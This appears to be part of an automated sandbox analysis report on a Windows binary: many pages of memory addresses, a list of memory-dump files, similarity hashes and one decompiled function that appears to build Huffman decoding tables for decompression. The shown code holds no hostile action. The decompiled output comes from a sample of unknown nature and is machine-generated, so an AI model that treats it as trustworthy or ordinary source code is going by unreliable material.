                                                                                                                                    0x00000000
                                                                                                                                    0x00406830
                                                                                                                                    0x00406830
                                                                                                                                    0x00406830
                                                                                                                                    0x00406833
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406810
                                                                                                                                    0x00406810
                                                                                                                                    0x00406814
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040681a
                                                                                                                                    0x0040681a
                                                                                                                                    0x0040681d
                                                                                                                                    0x00406820
                                                                                                                                    0x00406825
                                                                                                                                    0x00406827
                                                                                                                                    0x0040682a
                                                                                                                                    0x0040682d
                                                                                                                                    0x0040682d
                                                                                                                                    0x0040682d
                                                                                                                                    0x00406835
                                                                                                                                    0x00406835
                                                                                                                                    0x00406838
                                                                                                                                    0x0040683a
                                                                                                                                    0x0040683f
                                                                                                                                    0x00406842
                                                                                                                                    0x00406844
                                                                                                                                    0x00406847
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040684d
                                                                                                                                    0x0040684d
                                                                                                                                    0x0040684f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406855
                                                                                                                                    0x00406855
                                                                                                                                    0x00406859
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040685f
                                                                                                                                    0x0040685f
                                                                                                                                    0x00406862
                                                                                                                                    0x00406864
                                                                                                                                    0x00406902
                                                                                                                                    0x00406902
                                                                                                                                    0x00406905
                                                                                                                                    0x00406907
                                                                                                                                    0x00406907
                                                                                                                                    0x0040690a
                                                                                                                                    0x0040690d
                                                                                                                                    0x0040690f
                                                                                                                                    0x00406911
                                                                                                                                    0x00406913
                                                                                                                                    0x00406913
                                                                                                                                    0x0040691c
                                                                                                                                    0x00406921
                                                                                                                                    0x00406924
                                                                                                                                    0x00406927
                                                                                                                                    0x0040692a
                                                                                                                                    0x0040692d
                                                                                                                                    0x0040692d
                                                                                                                                    0x0040692d
                                                                                                                                    0x00406930
                                                                                                                                    0x00406936
                                                                                                                                    0x00406936
                                                                                                                                    0x0040693c
                                                                                                                                    0x0040693c
                                                                                                                                    0x0040693c
                                                                                                                                    0x00000000
                                                                                                                                    0x00406930
                                                                                                                                    0x0040686a
                                                                                                                                    0x0040686a
                                                                                                                                    0x00406870
                                                                                                                                    0x00406873
                                                                                                                                    0x00406875
                                                                                                                                    0x004068a0
                                                                                                                                    0x004068a3
                                                                                                                                    0x004068a9
                                                                                                                                    0x004068ae
                                                                                                                                    0x004068b4
                                                                                                                                    0x004068ba
                                                                                                                                    0x004068bc
                                                                                                                                    0x004068bf
                                                                                                                                    0x004068c8
                                                                                                                                    0x004068ce
                                                                                                                                    0x004068ce
                                                                                                                                    0x004068c1
                                                                                                                                    0x004068c3
                                                                                                                                    0x004068c5
                                                                                                                                    0x004068c5
                                                                                                                                    0x004068d0
                                                                                                                                    0x004068d6
                                                                                                                                    0x004068d9
                                                                                                                                    0x004068db
                                                                                                                                    0x004068dd
                                                                                                                                    0x004068e3
                                                                                                                                    0x004068e5
                                                                                                                                    0x004068e7
                                                                                                                                    0x004068ea
                                                                                                                                    0x004068f3
                                                                                                                                    0x004068f3
                                                                                                                                    0x004068f5
                                                                                                                                    0x004068ec
                                                                                                                                    0x004068ec
                                                                                                                                    0x004068ef
                                                                                                                                    0x004068ef
                                                                                                                                    0x004068f7
                                                                                                                                    0x004068f7
                                                                                                                                    0x004068e5
                                                                                                                                    0x004068fa
                                                                                                                                    0x004068fc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004068fc
                                                                                                                                    0x00406877
                                                                                                                                    0x00406877
                                                                                                                                    0x0040687d
                                                                                                                                    0x00406883
                                                                                                                                    0x00406885
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406887
                                                                                                                                    0x00406887
                                                                                                                                    0x00406889
                                                                                                                                    0x0040688b
                                                                                                                                    0x0040688e
                                                                                                                                    0x00406895
                                                                                                                                    0x00406895
                                                                                                                                    0x00406897
                                                                                                                                    0x00406890
                                                                                                                                    0x00406890
                                                                                                                                    0x00406892
                                                                                                                                    0x00406892
                                                                                                                                    0x00406899
                                                                                                                                    0x0040689b
                                                                                                                                    0x0040689e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004069a2
                                                                                                                                    0x004069a5
                                                                                                                                    0x004069a8
                                                                                                                                    0x004069ae
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406b85
                                                                                                                                    0x00406b85
                                                                                                                                    0x00406b85
                                                                                                                                    0x00406b88
                                                                                                                                    0x00406b8b
                                                                                                                                    0x00406b8d
                                                                                                                                    0x00406b90
                                                                                                                                    0x00406b96
                                                                                                                                    0x00406b9d
                                                                                                                                    0x00406b9f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406a73
                                                                                                                                    0x00406a73
                                                                                                                                    0x00406a9b
                                                                                                                                    0x00406a9b
                                                                                                                                    0x00406a9b
                                                                                                                                    0x00406a9d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406a7b
                                                                                                                                    0x00406a7b
                                                                                                                                    0x00406a7f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406a85
                                                                                                                                    0x00406a85
                                                                                                                                    0x00406a88
                                                                                                                                    0x00406a8b
                                                                                                                                    0x00406a8e
                                                                                                                                    0x00406a90
                                                                                                                                    0x00406a92
                                                                                                                                    0x00406a95
                                                                                                                                    0x00406a98
                                                                                                                                    0x00406a98
                                                                                                                                    0x00406a98
                                                                                                                                    0x00406a9f
                                                                                                                                    0x00406a9f
                                                                                                                                    0x00406aa7
                                                                                                                                    0x00406aaa
                                                                                                                                    0x00406ab0
                                                                                                                                    0x00406ab3
                                                                                                                                    0x00406ab7
                                                                                                                                    0x00406abb
                                                                                                                                    0x00406abe
                                                                                                                                    0x00406ac1
                                                                                                                                    0x00406ad9
                                                                                                                                    0x00406ad9
                                                                                                                                    0x00406adc
                                                                                                                                    0x00406aea
                                                                                                                                    0x00406aed
                                                                                                                                    0x00406ade
                                                                                                                                    0x00406ade
                                                                                                                                    0x00406ae0
                                                                                                                                    0x00406ae7
                                                                                                                                    0x00406ae7
                                                                                                                                    0x00406b16
                                                                                                                                    0x00406b16
                                                                                                                                    0x00406b16
                                                                                                                                    0x00406b19
                                                                                                                                    0x00406b1b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406af6
                                                                                                                                    0x00406af6
                                                                                                                                    0x00406afa
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406b00
                                                                                                                                    0x00406b00
                                                                                                                                    0x00406b03
                                                                                                                                    0x00406b06
                                                                                                                                    0x00406b09
                                                                                                                                    0x00406b0b
                                                                                                                                    0x00406b0d
                                                                                                                                    0x00406b10
                                                                                                                                    0x00406b13
                                                                                                                                    0x00406b13
                                                                                                                                    0x00406b13
                                                                                                                                    0x00406b1d
                                                                                                                                    0x00406b1d
                                                                                                                                    0x00406b1f
                                                                                                                                    0x00406b21
                                                                                                                                    0x00406b2c
                                                                                                                                    0x00406b2f
                                                                                                                                    0x00406b32
                                                                                                                                    0x00406b34
                                                                                                                                    0x00406b36
                                                                                                                                    0x00406b38
                                                                                                                                    0x00406b3b
                                                                                                                                    0x00406b3e
                                                                                                                                    0x00406b43
                                                                                                                                    0x00406b46
                                                                                                                                    0x00406b49
                                                                                                                                    0x00406b4c
                                                                                                                                    0x00406b53
                                                                                                                                    0x00406b56
                                                                                                                                    0x00406b58
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406b5e
                                                                                                                                    0x00406b5e
                                                                                                                                    0x00406b62
                                                                                                                                    0x00406b73
                                                                                                                                    0x00406b73
                                                                                                                                    0x00406b73
                                                                                                                                    0x00406b75
                                                                                                                                    0x00406b75
                                                                                                                                    0x00406b79
                                                                                                                                    0x00406b79
                                                                                                                                    0x00406b79
                                                                                                                                    0x00406b7b
                                                                                                                                    0x00406b7c
                                                                                                                                    0x00406b7f
                                                                                                                                    0x00406b7f
                                                                                                                                    0x00406b7f
                                                                                                                                    0x00406b82
                                                                                                                                    0x00000000
                                                                                                                                    0x00406b82
                                                                                                                                    0x00406b64
                                                                                                                                    0x00406b64
                                                                                                                                    0x00406b67
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406b6d
                                                                                                                                    0x00406b6d
                                                                                                                                    0x00000000
                                                                                                                                    0x00406b6d
                                                                                                                                    0x00406ac3
                                                                                                                                    0x00406ac3
                                                                                                                                    0x00406ac5
                                                                                                                                    0x00406ac7
                                                                                                                                    0x00406aca
                                                                                                                                    0x00406acd
                                                                                                                                    0x00406ad1
                                                                                                                                    0x00406ad1
                                                                                                                                    0x00406ba5
                                                                                                                                    0x00406ba5
                                                                                                                                    0x00406ba8
                                                                                                                                    0x00406baf
                                                                                                                                    0x00406bb3
                                                                                                                                    0x00406bb5
                                                                                                                                    0x00406bb8
                                                                                                                                    0x00406bbb
                                                                                                                                    0x00406bc0
                                                                                                                                    0x00406bc3
                                                                                                                                    0x00406bc5
                                                                                                                                    0x00406bc6
                                                                                                                                    0x00406bc9
                                                                                                                                    0x00406bd4
                                                                                                                                    0x00406bd7
                                                                                                                                    0x00406bee
                                                                                                                                    0x00406bf3
                                                                                                                                    0x00406bfa
                                                                                                                                    0x00406bff
                                                                                                                                    0x00406c03
                                                                                                                                    0x00406c05
                                                                                                                                    0x00406c05
                                                                                                                                    0x00406c05
                                                                                                                                    0x00406c08
                                                                                                                                    0x00406c0a
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c10
                                                                                                                                    0x00406c10
                                                                                                                                    0x00406c14
                                                                                                                                    0x00406c1f
                                                                                                                                    0x00406c32
                                                                                                                                    0x00406c37
                                                                                                                                    0x00406c3c
                                                                                                                                    0x00406c3e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c44
                                                                                                                                    0x00406c44
                                                                                                                                    0x00406c47
                                                                                                                                    0x00406c49
                                                                                                                                    0x00406c57
                                                                                                                                    0x00406c57
                                                                                                                                    0x00406c5a
                                                                                                                                    0x00406c5a
                                                                                                                                    0x00406c5d
                                                                                                                                    0x00406c60
                                                                                                                                    0x00406c63
                                                                                                                                    0x00406c66
                                                                                                                                    0x00406c69
                                                                                                                                    0x00406c6c
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c6c
                                                                                                                                    0x00406c4b
                                                                                                                                    0x00406c4b
                                                                                                                                    0x00406c51
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c51
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406ff0
                                                                                                                                    0x00406ff0
                                                                                                                                    0x00406ff6
                                                                                                                                    0x00406ffc
                                                                                                                                    0x00407001
                                                                                                                                    0x00407007
                                                                                                                                    0x0040700d
                                                                                                                                    0x0040700f
                                                                                                                                    0x00407012
                                                                                                                                    0x0040701b
                                                                                                                                    0x00407021
                                                                                                                                    0x00407021
                                                                                                                                    0x00407014
                                                                                                                                    0x00407016
                                                                                                                                    0x00407018
                                                                                                                                    0x00407018
                                                                                                                                    0x00407023
                                                                                                                                    0x00407025
                                                                                                                                    0x00407028
                                                                                                                                    0x00407063
                                                                                                                                    0x00407063
                                                                                                                                    0x00000000
                                                                                                                                    0x0040702a
                                                                                                                                    0x0040702a
                                                                                                                                    0x0040702a
                                                                                                                                    0x00407030
                                                                                                                                    0x00407033
                                                                                                                                    0x00407035
                                                                                                                                    0x0040706a
                                                                                                                                    0x0040706c
                                                                                                                                    0x00000000
                                                                                                                                    0x0040706c
                                                                                                                                    0x00000000
                                                                                                                                    0x00407035
                                                                                                                                    0x00000000
                                                                                                                                    0x00406674
                                                                                                                                    0x00407042
                                                                                                                                    0x00000000
                                                                                                                                    0x00407042
                                                                                                                                    0x00406a56
                                                                                                                                    0x00406a58
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406a5a
                                                                                                                                    0x00406a5a
                                                                                                                                    0x00406a5d
                                                                                                                                    0x00000000
                                                                                                                                    0x00406a5d
                                                                                                                                    0x004069a2
                                                                                                                                    0x00406963
                                                                                                                                    0x00407047
                                                                                                                                    0x0040704a
                                                                                                                                    0x0040704c
                                                                                                                                    0x00407055
                                                                                                                                    0x0040705b
                                                                                                                                    0x00000000

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: aa1aee8a5b3a43351eb0af44d038224c2164fb65a2c69693e5a9d071f73749d8
                                                                                                                                    • Instruction ID: cc79d415adf411fdcc3bed69cd8bbc2d74706c3cee3558b75ad944e4f2dff780
                                                                                                                                    • Opcode Fuzzy Hash: aa1aee8a5b3a43351eb0af44d038224c2164fb65a2c69693e5a9d071f73749d8
                                                                                                                                    • Instruction Fuzzy Hash: F5E19B71904709CFDB24CF98C880BAAB7F5FB44305F15852EE497A7291E378AA91CF14
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040711A, Relevance: .3, Instructions: 300COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0040711A(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d6b0 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42d6b0;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d6b0 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                                                                                                    0x00407125
                                                                                                                                    0x0040712d
                                                                                                                                    0x00407131
                                                                                                                                    0x00407133
                                                                                                                                    0x00407136
                                                                                                                                    0x00407138
                                                                                                                                    0x00407138
                                                                                                                                    0x0040713a
                                                                                                                                    0x00407141
                                                                                                                                    0x00407143
                                                                                                                                    0x00407143
                                                                                                                                    0x00407149
                                                                                                                                    0x0040715e
                                                                                                                                    0x00407166
                                                                                                                                    0x00407168
                                                                                                                                    0x0040716a
                                                                                                                                    0x0040716d
                                                                                                                                    0x0040716e
                                                                                                                                    0x0040716e
                                                                                                                                    0x00407174
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407176
                                                                                                                                    0x00407179
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407179
                                                                                                                                    0x0040717d
                                                                                                                                    0x00407180
                                                                                                                                    0x00407182
                                                                                                                                    0x00407182
                                                                                                                                    0x00407185
                                                                                                                                    0x0040718b
                                                                                                                                    0x0040718c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040718c
                                                                                                                                    0x00407191
                                                                                                                                    0x00407194
                                                                                                                                    0x00407196
                                                                                                                                    0x00407196
                                                                                                                                    0x0040719c
                                                                                                                                    0x0040719e
                                                                                                                                    0x004071af
                                                                                                                                    0x004071a2
                                                                                                                                    0x004071a6
                                                                                                                                    0x0040744b
                                                                                                                                    0x00000000
                                                                                                                                    0x0040744b
                                                                                                                                    0x004071ac
                                                                                                                                    0x004071ad
                                                                                                                                    0x004071ad
                                                                                                                                    0x004071b5
                                                                                                                                    0x004071b8
                                                                                                                                    0x004071bc
                                                                                                                                    0x004071be
                                                                                                                                    0x004071c0
                                                                                                                                    0x004071c3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004071cb
                                                                                                                                    0x004071d1
                                                                                                                                    0x004071d3
                                                                                                                                    0x004071d5
                                                                                                                                    0x004071d6
                                                                                                                                    0x004071eb
                                                                                                                                    0x004071eb
                                                                                                                                    0x004071ee
                                                                                                                                    0x004071f0
                                                                                                                                    0x004071f0
                                                                                                                                    0x004071f2
                                                                                                                                    0x004071f7
                                                                                                                                    0x004071f9
                                                                                                                                    0x00407200
                                                                                                                                    0x00407202
                                                                                                                                    0x0040720a
                                                                                                                                    0x0040720a
                                                                                                                                    0x0040720c
                                                                                                                                    0x0040720d
                                                                                                                                    0x0040721c
                                                                                                                                    0x00407220
                                                                                                                                    0x00407224
                                                                                                                                    0x00407227
                                                                                                                                    0x0040722a
                                                                                                                                    0x0040722f
                                                                                                                                    0x00407232
                                                                                                                                    0x00407238
                                                                                                                                    0x0040723f
                                                                                                                                    0x00407245
                                                                                                                                    0x0040743e
                                                                                                                                    0x0040743e
                                                                                                                                    0x00407443
                                                                                                                                    0x00407452
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407443
                                                                                                                                    0x00407252
                                                                                                                                    0x00407255
                                                                                                                                    0x00407258
                                                                                                                                    0x0040725b
                                                                                                                                    0x0040725f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040726a
                                                                                                                                    0x0040726d
                                                                                                                                    0x0040726e
                                                                                                                                    0x00407270
                                                                                                                                    0x00407276
                                                                                                                                    0x00407279
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040727f
                                                                                                                                    0x00407280
                                                                                                                                    0x00407283
                                                                                                                                    0x00407286
                                                                                                                                    0x00407289
                                                                                                                                    0x0040728f
                                                                                                                                    0x00407291
                                                                                                                                    0x00407291
                                                                                                                                    0x00407299
                                                                                                                                    0x0040729d
                                                                                                                                    0x004072a2
                                                                                                                                    0x004072c7
                                                                                                                                    0x004072cd
                                                                                                                                    0x004072cf
                                                                                                                                    0x004072d1
                                                                                                                                    0x004072d4
                                                                                                                                    0x004072dd
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004072a4
                                                                                                                                    0x004072a4
                                                                                                                                    0x004072ad
                                                                                                                                    0x004072b1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004072c2
                                                                                                                                    0x004072c2
                                                                                                                                    0x004072c5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004072b5
                                                                                                                                    0x004072b8
                                                                                                                                    0x004072ba
                                                                                                                                    0x004072be
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004072c0
                                                                                                                                    0x004072c0
                                                                                                                                    0x00000000
                                                                                                                                    0x004072c2
                                                                                                                                    0x004072e6
                                                                                                                                    0x004072ec
                                                                                                                                    0x004072f6
                                                                                                                                    0x004072f8
                                                                                                                                    0x004072fd
                                                                                                                                    0x004072ff
                                                                                                                                    0x00407335
                                                                                                                                    0x00407301
                                                                                                                                    0x00407301
                                                                                                                                    0x00407304
                                                                                                                                    0x00407307
                                                                                                                                    0x00407311
                                                                                                                                    0x00407314
                                                                                                                                    0x0040731b
                                                                                                                                    0x00407326
                                                                                                                                    0x0040732d
                                                                                                                                    0x0040732d
                                                                                                                                    0x00407337
                                                                                                                                    0x0040733a
                                                                                                                                    0x0040733c
                                                                                                                                    0x00407342
                                                                                                                                    0x00407342
                                                                                                                                    0x0040734b
                                                                                                                                    0x0040734e
                                                                                                                                    0x00407353
                                                                                                                                    0x00407362
                                                                                                                                    0x0040736a
                                                                                                                                    0x0040736f
                                                                                                                                    0x00407393
                                                                                                                                    0x0040739b
                                                                                                                                    0x0040739f
                                                                                                                                    0x004073a5
                                                                                                                                    0x00407371
                                                                                                                                    0x0040737f
                                                                                                                                    0x00407382
                                                                                                                                    0x00407388
                                                                                                                                    0x00407388
                                                                                                                                    0x004073a9
                                                                                                                                    0x00407364
                                                                                                                                    0x00407364
                                                                                                                                    0x00407364
                                                                                                                                    0x004073ba
                                                                                                                                    0x004073be
                                                                                                                                    0x004073ca
                                                                                                                                    0x004073c5
                                                                                                                                    0x004073c8
                                                                                                                                    0x004073c8
                                                                                                                                    0x004073d2
                                                                                                                                    0x004073d7
                                                                                                                                    0x004073df
                                                                                                                                    0x004073db
                                                                                                                                    0x004073dd
                                                                                                                                    0x004073dd
                                                                                                                                    0x004073e5
                                                                                                                                    0x004073e7
                                                                                                                                    0x004073ee
                                                                                                                                    0x004073f8
                                                                                                                                    0x00407402
                                                                                                                                    0x0040741e
                                                                                                                                    0x00407422
                                                                                                                                    0x00407267
                                                                                                                                    0x0040726d
                                                                                                                                    0x0040726e
                                                                                                                                    0x00407270
                                                                                                                                    0x00407276
